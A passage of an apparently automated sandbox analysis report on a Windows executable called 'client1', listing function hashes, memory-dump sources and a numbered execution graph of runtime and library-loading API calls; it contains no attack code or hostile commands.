                                                    • Instruction ID: a1c1ac3e35cef5dca5b2dffa328874262bdb24a07ee44c6fa033a46e3c123853
                                                    • Opcode Fuzzy Hash: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                    • Instruction Fuzzy Hash: CC21E362A087C281EB30AB21D4542ADB3BBFB94B84FC54035C6AC43284DFBDE5498771
                                                    Function 00007FF79F622880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Error detected
                                                    • API String ID: 1878133881-3513342764
                                                    • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction ID: 05cd645ff5f888422db5e4e7115e06dcb47c015c2c7129efa72a60483e0df11d
                                                    • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction Fuzzy Hash: 792153726287C291FA30AB20F4517EAA359FB84788FC05135EA9D47A95DF3CD205C751
                                                    Function 00007FF79F622770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Fatal error detected
                                                    • API String ID: 1878133881-4025702859
                                                    • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction ID: 79b571e26da2bfd48c070471a7e58d0411b39622869149dfb16ba3604a0de879
                                                    • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction Fuzzy Hash: 3C21B5726287C291EB30BB20F8517EAA359FB84788FC00135E69D47A95DF3CD205C751
                                                    Function 00007FF79F62EFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction ID: 9d94cc3acb5f3c85cba13d30bb3129c537d7161fd2bf0c3510a608b2a8661950
                                                    • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction Fuzzy Hash: 6B115432618B8182EB219F25F5402D9B7A9FB88B94F584234EF9C47754DF3DD551C710
                                                    Function 00007FF79F63F00C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                    • String ID: :
                                                    • API String ID: 2595371189-336475711
                                                    • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction ID: f6a196918b46ec67a83ca2aae2117e4ea2a4506a7808c67bb6a2d9dc34037f39
                                                    • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction Fuzzy Hash: 2601D42292C38286FB35BF74A8612FEA3A9EF44708FC41135D56C82285DF6CE544DA24

                                                    Execution Graph

                                                    Execution Coverage:1.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:823
                                                    Total number of Limit Nodes:22
                                                    execution_graph 96490 7ff79f62b19c 96511 7ff79f62b36c 96490->96511 96493 7ff79f62b2e8 96607 7ff79f62b69c 7 API calls 2 library calls 96493->96607 96494 7ff79f62b1b8 __scrt_acquire_startup_lock 96496 7ff79f62b2f2 96494->96496 96502 7ff79f62b1d6 __scrt_release_startup_lock 96494->96502 96608 7ff79f62b69c 7 API calls 2 library calls 96496->96608 96498 7ff79f62b1fb 96499 7ff79f62b2fd __GetCurrentState 96500 7ff79f62b281 96517 7ff79f62b7e8 96500->96517 96502->96498 96502->96500 96604 7ff79f638984 45 API calls 96502->96604 96503 7ff79f62b286 96520 7ff79f621000 96503->96520 96508 7ff79f62b2a9 96508->96499 96606 7ff79f62b500 7 API calls __scrt_initialize_crt 96508->96606 96510 7ff79f62b2c0 96510->96498 96609 7ff79f62b96c 96511->96609 96514 7ff79f62b1b0 96514->96493 96514->96494 96515 7ff79f62b39b __scrt_initialize_crt 96515->96514 96611 7ff79f62cac8 7 API calls 2 library calls 96515->96611 96612 7ff79f62c210 96517->96612 96521 7ff79f62100b 96520->96521 96614 7ff79f627600 96521->96614 96523 7ff79f62101d 96621 7ff79f634f14 96523->96621 96525 7ff79f62367b 96628 7ff79f621af0 96525->96628 96531 7ff79f623699 96595 7ff79f62379a 96531->96595 96644 7ff79f623b20 96531->96644 96533 7ff79f6236cb 96533->96595 96647 7ff79f626990 96533->96647 96535 7ff79f6236e7 96537 7ff79f626990 61 API calls 96535->96537 96549 7ff79f623733 96535->96549 96541 7ff79f623708 __std_exception_copy 96537->96541 96538 7ff79f623748 96666 7ff79f6219d0 96538->96666 96545 7ff79f626f90 58 API calls 96541->96545 96541->96549 96542 7ff79f6219d0 121 API calls 96544 7ff79f62377e 96542->96544 96548 7ff79f623782 96544->96548 96555 7ff79f6237c0 96544->96555 96545->96549 96547 7ff79f623888 96552 7ff79f62389e SetDllDirectoryW 96547->96552 96553 7ff79f62388d 96547->96553 96742 7ff79f622770 59 API calls 2 library calls 96548->96742 96662 7ff79f626f90 96549->96662 96550 7ff79f623868 96551 7ff79f6238ab 96550->96551 96677 7ff79f627a30 96550->96677 96691 7ff79f625e40 96551->96691 96552->96551 96777 7ff79f622770 59 API calls 2 library calls 96553->96777 96568 7ff79f62383d 96555->96568 96752 7ff79f623cb0 96555->96752 96561 7ff79f6237e2 96775 7ff79f622770 59 API calls 2 library calls 96561->96775 96562 7ff79f623906 96570 7ff79f6239c6 96562->96570 96576 7ff79f623919 96562->96576 96565 7ff79f623810 96565->96568 96569 7ff79f623815 96565->96569 96567 7ff79f6238c8 96567->96562 96779 7ff79f625640 161 API calls 3 library calls 96567->96779 96568->96550 96776 7ff79f623280 59 API calls 96568->96776 96771 7ff79f62f2ac 96569->96771 96732 7ff79f623110 96570->96732 96574 7ff79f6238d9 96577 7ff79f6238fc 96574->96577 96578 7ff79f6238dd 96574->96578 96583 7ff79f623965 96576->96583 96783 7ff79f621b30 96576->96783 96782 7ff79f625890 FreeLibrary 96577->96782 96780 7ff79f6255d0 91 API calls 96578->96780 96583->96595 96695 7ff79f6230b0 96583->96695 96584 7ff79f6238e7 96584->96577 96586 7ff79f6238eb 96584->96586 96585 7ff79f6239fb 96587 7ff79f626990 61 API calls 96585->96587 96781 7ff79f625c90 60 API calls 96586->96781 96590 7ff79f623a07 96587->96590 96593 7ff79f623a18 96590->96593 96590->96595 96591 7ff79f6239a1 96787 7ff79f625890 FreeLibrary 96591->96787 96592 7ff79f6238fa 96592->96562 96789 7ff79f626fd0 63 API calls 2 library calls 96593->96789 96743 7ff79f62ad80 96595->96743 96597 7ff79f623a30 96790 7ff79f625890 FreeLibrary 96597->96790 96599 7ff79f623a57 96792 7ff79f621ab0 74 API calls __std_exception_copy 96599->96792 96600 7ff79f623a3c 96600->96599 96791 7ff79f626c90 67 API calls 2 library calls 96600->96791 96603 7ff79f623a5f 96603->96595 96604->96500 96605 7ff79f62b82c GetModuleHandleW 96605->96508 96606->96510 96607->96496 96608->96499 96610 7ff79f62b38e __scrt_dllmain_crt_thread_attach 96609->96610 96610->96514 96610->96515 96611->96514 96613 7ff79f62b7ff GetStartupInfoW 96612->96613 96613->96503 96616 7ff79f62761f 96614->96616 96615 7ff79f627670 WideCharToMultiByte 96615->96616 96618 7ff79f627718 96615->96618 96616->96615 96616->96618 96619 7ff79f6276c6 WideCharToMultiByte 96616->96619 96620 7ff79f627627 __std_exception_copy 96616->96620 96793 7ff79f622620 57 API calls 2 library calls 96618->96793 96619->96616 96619->96618 96620->96523 96622 7ff79f63ec40 96621->96622 96624 7ff79f63ece6 96622->96624 96625 7ff79f63ec93 96622->96625 96795 7ff79f63eb18 71 API calls _fread_nolock 96624->96795 96794 7ff79f639ce4 37 API calls 2 library calls 96625->96794 96627 7ff79f63ecbc 96627->96525 96629 7ff79f621b05 96628->96629 96630 7ff79f621b20 96629->96630 96796 7ff79f6224d0 59 API calls 3 library calls 96629->96796 96630->96595 96632 7ff79f623ba0 96630->96632 96797 7ff79f62adb0 96632->96797 96635 7ff79f623bdb 96799 7ff79f622620 57 API calls 2 library calls 96635->96799 96636 7ff79f623bf2 96800 7ff79f627b40 59 API calls 96636->96800 96639 7ff79f623bee 96642 7ff79f62ad80 _wfindfirst32i64 8 API calls 96639->96642 96640 7ff79f623c05 96640->96639 96801 7ff79f622770 59 API calls 2 library calls 96640->96801 96643 7ff79f623c2f 96642->96643 96643->96531 96645 7ff79f621b30 49 API calls 96644->96645 96646 7ff79f623b3d 96645->96646 96646->96533 96648 7ff79f62699a 96647->96648 96649 7ff79f627a30 57 API calls 96648->96649 96650 7ff79f6269bc GetEnvironmentVariableW 96649->96650 96651 7ff79f6269d4 ExpandEnvironmentStringsW 96650->96651 96652 7ff79f626a26 96650->96652 96802 7ff79f627b40 59 API calls 96651->96802 96653 7ff79f62ad80 _wfindfirst32i64 8 API calls 96652->96653 96655 7ff79f626a38 96653->96655 96655->96535 96656 7ff79f6269fc 96656->96652 96657 7ff79f626a06 96656->96657 96803 7ff79f63910c 37 API calls 2 library calls 96657->96803 96659 7ff79f626a0e 96660 7ff79f62ad80 _wfindfirst32i64 8 API calls 96659->96660 96661 7ff79f626a1e 96660->96661 96661->96535 96663 7ff79f627a30 57 API calls 96662->96663 96664 7ff79f626fa7 SetEnvironmentVariableW 96663->96664 96665 7ff79f626fbf __std_exception_copy 96664->96665 96665->96538 96667 7ff79f621b30 49 API calls 96666->96667 96668 7ff79f621a00 96667->96668 96669 7ff79f621b30 49 API calls 96668->96669 96675 7ff79f621a7a 96668->96675 96670 7ff79f621a22 96669->96670 96671 7ff79f623b20 49 API calls 96670->96671 96670->96675 96672 7ff79f621a3b 96671->96672 96804 7ff79f6217b0 96672->96804 96675->96542 96675->96568 96676 7ff79f62f2ac 74 API calls 96676->96675 96678 7ff79f627ad7 MultiByteToWideChar 96677->96678 96679 7ff79f627a51 MultiByteToWideChar 96677->96679 96680 7ff79f627afa 96678->96680 96681 7ff79f627b1f 96678->96681 96682 7ff79f627a77 96679->96682 96683 7ff79f627a9c 96679->96683 96889 7ff79f622620 57 API calls 2 library calls 96680->96889 96681->96547 96887 7ff79f622620 57 API calls 2 library calls 96682->96887 96683->96678 96688 7ff79f627ab2 96683->96688 96686 7ff79f627b0d 96686->96547 96687 7ff79f627a8a 96687->96547 96888 7ff79f622620 57 API calls 2 library calls 96688->96888 96690 7ff79f627ac5 96690->96547 96692 7ff79f625e55 96691->96692 96693 7ff79f6238b0 96692->96693 96890 7ff79f6224d0 59 API calls 3 library calls 96692->96890 96693->96562 96778 7ff79f625ae0 122 API calls 2 library calls 96693->96778 96891 7ff79f624960 96695->96891 96698 7ff79f6230fd 96698->96591 96700 7ff79f6230d4 96700->96698 96947 7ff79f6246e0 96700->96947 96702 7ff79f6230e0 96702->96698 96957 7ff79f624840 96702->96957 96704 7ff79f6230ec 96704->96698 96705 7ff79f623327 96704->96705 96706 7ff79f62333c 96704->96706 96988 7ff79f622770 59 API calls 2 library calls 96705->96988 96708 7ff79f62335c 96706->96708 96720 7ff79f623372 __std_exception_copy 96706->96720 96989 7ff79f622770 59 API calls 2 library calls 96708->96989 96709 7ff79f62ad80 _wfindfirst32i64 8 API calls 96711 7ff79f6234ca 96709->96711 96711->96591 96712 7ff79f623333 __std_exception_copy 96712->96709 96715 7ff79f621b30 49 API calls 96715->96720 96716 7ff79f62360b 96997 7ff79f622770 59 API calls 2 library calls 96716->96997 96718 7ff79f6235e5 96996 7ff79f622770 59 API calls 2 library calls 96718->96996 96720->96712 96720->96715 96720->96716 96720->96718 96721 7ff79f6234d6 96720->96721 96962 7ff79f6212b0 96720->96962 96990 7ff79f621780 59 API calls 96720->96990 96722 7ff79f623542 96721->96722 96991 7ff79f63910c 37 API calls 2 library calls 96721->96991 96992 7ff79f6216d0 59 API calls 96722->96992 96725 7ff79f623564 96726 7ff79f623577 96725->96726 96727 7ff79f623569 96725->96727 96994 7ff79f622ea0 37 API calls 96726->96994 96993 7ff79f63910c 37 API calls 2 library calls 96727->96993 96730 7ff79f623575 96995 7ff79f6223b0 62 API calls __std_exception_copy 96730->96995 96733 7ff79f6231c4 96732->96733 96739 7ff79f623183 96732->96739 96734 7ff79f623203 96733->96734 97169 7ff79f621ab0 74 API calls __std_exception_copy 96733->97169 96736 7ff79f62ad80 _wfindfirst32i64 8 API calls 96734->96736 96737 7ff79f623215 96736->96737 96737->96595 96788 7ff79f626f20 57 API calls __std_exception_copy 96737->96788 96739->96733 97113 7ff79f622990 96739->97113 97168 7ff79f621440 161 API calls 2 library calls 96739->97168 97170 7ff79f621780 59 API calls 96739->97170 96742->96595 96744 7ff79f62ad89 96743->96744 96745 7ff79f62ae40 IsProcessorFeaturePresent 96744->96745 96746 7ff79f6237ae 96744->96746 96747 7ff79f62ae58 96745->96747 96746->96605 97268 7ff79f62b034 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 96747->97268 96749 7ff79f62ae6b 97269 7ff79f62ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96749->97269 96753 7ff79f623cbc 96752->96753 96754 7ff79f627a30 57 API calls 96753->96754 96755 7ff79f623ce7 96754->96755 96756 7ff79f627a30 57 API calls 96755->96756 96757 7ff79f623cfa 96756->96757 97270 7ff79f6354c8 96757->97270 96760 7ff79f62ad80 _wfindfirst32i64 8 API calls 96761 7ff79f6237da 96760->96761 96761->96561 96762 7ff79f627200 96761->96762 96763 7ff79f627224 96762->96763 96764 7ff79f6272fb __std_exception_copy 96763->96764 96765 7ff79f62f934 73 API calls 96763->96765 96764->96565 96766 7ff79f62723e 96765->96766 96766->96764 97438 7ff79f637938 96766->97438 96768 7ff79f62f934 73 API calls 96770 7ff79f627253 96768->96770 96769 7ff79f62f5fc _fread_nolock 53 API calls 96769->96770 96770->96764 96770->96768 96770->96769 96772 7ff79f62f2dc 96771->96772 97454 7ff79f62f088 96772->97454 96774 7ff79f62f2f5 96774->96561 96775->96595 96776->96550 96777->96595 96778->96567 96779->96574 96780->96584 96781->96592 96782->96562 96784 7ff79f621b55 96783->96784 96785 7ff79f633be4 49 API calls 96784->96785 96786 7ff79f621b78 96785->96786 96786->96583 96787->96595 96788->96585 96789->96597 96790->96600 96791->96599 96792->96603 96793->96620 96794->96627 96795->96627 96796->96630 96798 7ff79f623bac GetModuleFileNameW 96797->96798 96798->96635 96798->96636 96799->96639 96800->96640 96801->96639 96802->96656 96803->96659 96805 7ff79f6217d4 96804->96805 96808 7ff79f6217e4 96804->96808 96806 7ff79f623cb0 116 API calls 96805->96806 96806->96808 96807 7ff79f627200 83 API calls 96809 7ff79f621815 96807->96809 96808->96807 96837 7ff79f621842 96808->96837 96809->96837 96838 7ff79f62f934 96809->96838 96811 7ff79f62ad80 _wfindfirst32i64 8 API calls 96813 7ff79f6219c0 96811->96813 96812 7ff79f62182b 96814 7ff79f62184c 96812->96814 96815 7ff79f62182f 96812->96815 96813->96675 96813->96676 96842 7ff79f62f5fc 96814->96842 96851 7ff79f6224d0 59 API calls 3 library calls 96815->96851 96819 7ff79f621867 96852 7ff79f6224d0 59 API calls 3 library calls 96819->96852 96820 7ff79f62f934 73 API calls 96822 7ff79f6218d1 96820->96822 96823 7ff79f6218fe 96822->96823 96824 7ff79f6218e3 96822->96824 96825 7ff79f62f5fc _fread_nolock 53 API calls 96823->96825 96853 7ff79f6224d0 59 API calls 3 library calls 96824->96853 96827 7ff79f621913 96825->96827 96827->96819 96828 7ff79f621925 96827->96828 96845 7ff79f62f370 96828->96845 96831 7ff79f62193d 96854 7ff79f622770 59 API calls 2 library calls 96831->96854 96833 7ff79f621993 96834 7ff79f62f2ac 74 API calls 96833->96834 96833->96837 96834->96837 96835 7ff79f621950 96835->96833 96855 7ff79f622770 59 API calls 2 library calls 96835->96855 96837->96811 96839 7ff79f62f964 96838->96839 96856 7ff79f62f6c4 96839->96856 96841 7ff79f62f97d 96841->96812 96869 7ff79f62f61c 96842->96869 96846 7ff79f62f379 96845->96846 96847 7ff79f621939 96845->96847 96885 7ff79f634444 11 API calls _set_fmode 96846->96885 96847->96831 96847->96835 96849 7ff79f62f37e 96886 7ff79f639db0 37 API calls _invalid_parameter_noinfo 96849->96886 96851->96837 96852->96837 96853->96837 96854->96837 96855->96833 96857 7ff79f62f72e 96856->96857 96858 7ff79f62f6ee 96856->96858 96857->96858 96859 7ff79f62f73a 96857->96859 96868 7ff79f639ce4 37 API calls 2 library calls 96858->96868 96867 7ff79f6342ec EnterCriticalSection 96859->96867 96861 7ff79f62f715 96861->96841 96863 7ff79f62f73f 96864 7ff79f62f848 71 API calls 96863->96864 96865 7ff79f62f751 96864->96865 96866 7ff79f6342f8 _fread_nolock LeaveCriticalSection 96865->96866 96866->96861 96868->96861 96870 7ff79f62f646 96869->96870 96881 7ff79f621861 96869->96881 96871 7ff79f62f692 96870->96871 96872 7ff79f62f655 __scrt_get_show_window_mode 96870->96872 96870->96881 96882 7ff79f6342ec EnterCriticalSection 96871->96882 96883 7ff79f634444 11 API calls _set_fmode 96872->96883 96874 7ff79f62f69a 96876 7ff79f62f39c _fread_nolock 51 API calls 96874->96876 96878 7ff79f62f6b1 96876->96878 96877 7ff79f62f66a 96884 7ff79f639db0 37 API calls _invalid_parameter_noinfo 96877->96884 96880 7ff79f6342f8 _fread_nolock LeaveCriticalSection 96878->96880 96880->96881 96881->96819 96881->96820 96883->96877 96885->96849 96887->96687 96888->96690 96889->96686 96890->96693 96892 7ff79f624970 96891->96892 96893 7ff79f621b30 49 API calls 96892->96893 96894 7ff79f6249a2 96893->96894 96895 7ff79f6249cb 96894->96895 96896 7ff79f6249ab 96894->96896 96897 7ff79f624a22 96895->96897 96998 7ff79f623d30 96895->96998 97011 7ff79f622770 59 API calls 2 library calls 96896->97011 96900 7ff79f623d30 49 API calls 96897->96900 96906 7ff79f624a3b 96900->96906 96901 7ff79f6249c1 96904 7ff79f62ad80 _wfindfirst32i64 8 API calls 96901->96904 96902 7ff79f624a0a 97001 7ff79f623c40 96902->97001 96903 7ff79f6249ec 96903->96902 97012 7ff79f622770 59 API calls 2 library calls 96903->97012 96910 7ff79f6230be 96904->96910 96905 7ff79f624a59 97007 7ff79f6271b0 96905->97007 96906->96905 97013 7ff79f622770 59 API calls 2 library calls 96906->97013 96910->96698 96919 7ff79f624ce0 96910->96919 96912 7ff79f624a66 96914 7ff79f624a6b 96912->96914 96915 7ff79f624a8d 96912->96915 97014 7ff79f622620 57 API calls 2 library calls 96914->97014 97015 7ff79f623df0 112 API calls 96915->97015 96918 7ff79f6271b0 58 API calls 96918->96897 96920 7ff79f626990 61 API calls 96919->96920 96922 7ff79f624cf5 96920->96922 96921 7ff79f624d10 96923 7ff79f627a30 57 API calls 96921->96923 96922->96921 97043 7ff79f622880 59 API calls 2 library calls 96922->97043 96925 7ff79f624d54 96923->96925 96926 7ff79f624d59 96925->96926 96927 7ff79f624d70 96925->96927 97044 7ff79f622770 59 API calls 2 library calls 96926->97044 96930 7ff79f627a30 57 API calls 96927->96930 96929 7ff79f624d65 96929->96700 96932 7ff79f624da5 96930->96932 96934 7ff79f621b30 49 API calls 96932->96934 96945 7ff79f624daa __std_exception_copy 96932->96945 96933 7ff79f624f51 96933->96700 96935 7ff79f624e27 96934->96935 96936 7ff79f624e2e 96935->96936 96937 7ff79f624e53 96935->96937 97045 7ff79f622770 59 API calls 2 library calls 96936->97045 96938 7ff79f627a30 57 API calls 96937->96938 96941 7ff79f624e6c 96938->96941 96940 7ff79f624e43 96940->96700 96941->96945 97016 7ff79f624ac0 96941->97016 96946 7ff79f624f3a 96945->96946 97047 7ff79f622770 59 API calls 2 library calls 96945->97047 96946->96700 96948 7ff79f6246f7 96947->96948 96948->96948 96949 7ff79f624720 96948->96949 96956 7ff79f624737 __std_exception_copy 96948->96956 97063 7ff79f622770 59 API calls 2 library calls 96949->97063 96951 7ff79f62472c 96951->96702 96952 7ff79f62481b 96952->96702 96954 7ff79f6212b0 122 API calls 96954->96956 96956->96952 96956->96954 97064 7ff79f622770 59 API calls 2 library calls 96956->97064 97065 7ff79f621780 59 API calls 96956->97065 96958 7ff79f624947 96957->96958 96960 7ff79f62485b 96957->96960 96958->96704 96960->96958 96961 7ff79f622770 59 API calls 96960->96961 97066 7ff79f621780 59 API calls 96960->97066 96961->96960 96963 7ff79f6212f8 96962->96963 96964 7ff79f6212c6 96962->96964 96966 7ff79f62f934 73 API calls 96963->96966 96965 7ff79f623cb0 116 API calls 96964->96965 96967 7ff79f6212d6 96965->96967 96968 7ff79f62130a 96966->96968 96967->96963 96971 7ff79f6212de 96967->96971 96969 7ff79f62130e 96968->96969 96970 7ff79f62132f 96968->96970 97086 7ff79f6224d0 59 API calls 3 library calls 96969->97086 96976 7ff79f621364 96970->96976 96977 7ff79f621344 96970->96977 97085 7ff79f622770 59 API calls 2 library calls 96971->97085 96974 7ff79f621325 96974->96720 96975 7ff79f6212ee 96975->96720 96979 7ff79f62137e 96976->96979 96983 7ff79f621395 96976->96983 97087 7ff79f6224d0 59 API calls 3 library calls 96977->97087 97067 7ff79f621050 96979->97067 96981 7ff79f62f5fc _fread_nolock 53 API calls 96981->96983 96982 7ff79f621421 96982->96720 96983->96981 96985 7ff79f6213de 96983->96985 96986 7ff79f62135f __std_exception_copy 96983->96986 96984 7ff79f62f2ac 74 API calls 96984->96982 97088 7ff79f6224d0 59 API calls 3 library calls 96985->97088 96986->96982 96986->96984 96988->96712 96989->96712 96990->96720 96991->96722 96992->96725 96993->96730 96994->96730 96995->96712 96996->96712 96997->96712 96999 7ff79f621b30 49 API calls 96998->96999 97000 7ff79f623d60 96999->97000 97000->96903 97002 7ff79f623c4a 97001->97002 97003 7ff79f627a30 57 API calls 97002->97003 97004 7ff79f623c72 97003->97004 97005 7ff79f62ad80 _wfindfirst32i64 8 API calls 97004->97005 97006 7ff79f623c9a 97005->97006 97006->96897 97006->96918 97008 7ff79f627a30 57 API calls 97007->97008 97009 7ff79f6271c7 LoadLibraryExW 97008->97009 97010 7ff79f6271e4 __std_exception_copy 97009->97010 97010->96912 97011->96901 97012->96902 97013->96905 97014->96901 97015->96901 97017 7ff79f624ada 97016->97017 97021 7ff79f624bf3 97017->97021 97025 7ff79f624cc9 97017->97025 97042 7ff79f624c91 97017->97042 97048 7ff79f6356d0 47 API calls 97017->97048 97049 7ff79f621780 59 API calls 97017->97049 97018 7ff79f62ad80 _wfindfirst32i64 8 API calls 97020 7ff79f624cb0 97018->97020 97046 7ff79f627c30 59 API calls __std_exception_copy 97020->97046 97021->97042 97050 7ff79f639184 97021->97050 97060 7ff79f622770 59 API calls 2 library calls 97025->97060 97028 7ff79f624c16 97029 7ff79f639184 _fread_nolock 37 API calls 97028->97029 97030 7ff79f624c28 97029->97030 97057 7ff79f6357dc 39 API calls 3 library calls 97030->97057 97032 7ff79f624c34 97058 7ff79f635d64 73 API calls 97032->97058 97034 7ff79f624c46 97059 7ff79f635d64 73 API calls 97034->97059 97036 7ff79f624c58 97037 7ff79f634f14 71 API calls 97036->97037 97038 7ff79f624c69 97037->97038 97039 7ff79f634f14 71 API calls 97038->97039 97040 7ff79f624c7d 97039->97040 97041 7ff79f634f14 71 API calls 97040->97041 97041->97042 97042->97018 97043->96921 97044->96929 97045->96940 97046->96945 97047->96933 97048->97017 97049->97017 97051 7ff79f63918d 97050->97051 97052 7ff79f624c0a 97050->97052 97061 7ff79f634444 11 API calls _set_fmode 97051->97061 97056 7ff79f6357dc 39 API calls 3 library calls 97052->97056 97054 7ff79f639192 97062 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97054->97062 97056->97028 97057->97032 97058->97034 97059->97036 97060->97042 97061->97054 97063->96951 97064->96956 97065->96956 97066->96960 97068 7ff79f6210a6 97067->97068 97069 7ff79f6210ad 97068->97069 97070 7ff79f6210d3 97068->97070 97093 7ff79f622770 59 API calls 2 library calls 97069->97093 97073 7ff79f621109 97070->97073 97074 7ff79f6210ed 97070->97074 97072 7ff79f6210c0 97072->96986 97076 7ff79f62111b 97073->97076 97083 7ff79f621137 memcpy_s 97073->97083 97094 7ff79f6224d0 59 API calls 3 library calls 97074->97094 97095 7ff79f6224d0 59 API calls 3 library calls 97076->97095 97078 7ff79f62f5fc _fread_nolock 53 API calls 97078->97083 97079 7ff79f621104 __std_exception_copy 97079->96986 97080 7ff79f6211fe 97096 7ff79f622770 59 API calls 2 library calls 97080->97096 97083->97078 97083->97079 97083->97080 97084 7ff79f62f370 37 API calls 97083->97084 97089 7ff79f62fd3c 97083->97089 97084->97083 97085->96975 97086->96974 97087->96986 97088->96986 97090 7ff79f62fd6c 97089->97090 97097 7ff79f62fa8c 97090->97097 97092 7ff79f62fd8a 97092->97083 97093->97072 97094->97079 97095->97079 97096->97079 97098 7ff79f62fad9 97097->97098 97099 7ff79f62faac 97097->97099 97098->97092 97099->97098 97100 7ff79f62fae1 97099->97100 97101 7ff79f62fab6 97099->97101 97104 7ff79f62f9cc 97100->97104 97111 7ff79f639ce4 37 API calls 2 library calls 97101->97111 97112 7ff79f6342ec EnterCriticalSection 97104->97112 97106 7ff79f62f9e9 97107 7ff79f62fa0c 74 API calls 97106->97107 97108 7ff79f62f9f2 97107->97108 97109 7ff79f6342f8 _fread_nolock LeaveCriticalSection 97108->97109 97110 7ff79f62f9fd 97109->97110 97110->97098 97111->97098 97114 7ff79f6229a6 97113->97114 97115 7ff79f621b30 49 API calls 97114->97115 97116 7ff79f6229db 97115->97116 97117 7ff79f623b20 49 API calls 97116->97117 97145 7ff79f622de1 97116->97145 97118 7ff79f622a4f 97117->97118 97171 7ff79f622e00 97118->97171 97121 7ff79f622aca 97124 